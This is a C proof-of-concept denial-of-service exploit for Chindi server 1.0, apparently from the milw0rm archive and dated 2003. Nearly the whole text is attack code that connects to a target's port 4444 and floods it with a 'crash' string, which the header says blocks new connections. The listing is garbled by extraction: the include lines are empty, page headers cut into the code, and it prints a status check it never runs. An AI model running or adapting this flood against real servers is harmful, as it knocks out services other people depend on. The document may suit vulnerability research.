1 /***************************************************
2 * Chindi server 1.0 Denial of Service
3 * Proof of Concept by Luca Ercoli luca.ercoli at inwind.it
4 * After DoS, server appears to be up, but will not allow
5 * new connections.
6 ****************************************************
7
8 #include
9 #include
10 #include
11 #include
12 #include
13
14 #define PORT 4444
15 #define DOS "crash"
16
17
18 int main(int argc, char *argv[]){
19
20 int nOpt,count,sockfd;
21 struct hostent *he;
22 struct sockaddr_in server_addr;
23
24 char *host;
25
26 printf ("\nChindi server 1.0 remote DoS\n\n");
27
28 if(argc < 2 ) {
29 printf ("Usage: %s −t target\n",argv[0]);
30 exit(0);
31 }
32
33 while((nOpt = getopt(argc, argv, "t")) != −1) {
34
35 switch(nOpt) {
36 case ’t’:
37 host = optarg;
38 break;
39 default:exit(0);
40 }
41 }
42
43 if ((he = gethostbyname(argv[2])) == NULL)
44 {
45 herror("gethostbyname");
46 exit(1);
47 }
48
49 server_addr.sin_family = AF_INET;
50 server_addr.sin_port = htons(PORT);
51 server_addr.sin_addr = *((struct in_addr *) he−>h_addr);
52
Page 1/2
Chindi Server 1.0 Denial of Service Exploit
Luca Ercoli
04/18/2003
53 sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
54
55 if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct
56 sockaddr)) == −1)
57 {
58 perror("Connect");
59 exit(1);
60 }
61
62 printf("1. Connected\n");
63 sleep(1);
64 printf("2. Sending crash string\n");
65 sleep(1);
66 printf("3. Verifing server status: ");
67 sleep(1);
68
69 for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);
70
71 close(sockfd);
72
73
74 // milw0rm.com [2003−04−18]
Page 2/2
Chindi Server 1.0 Denial of Service Exploit
Luca Ercoli
04/18/2003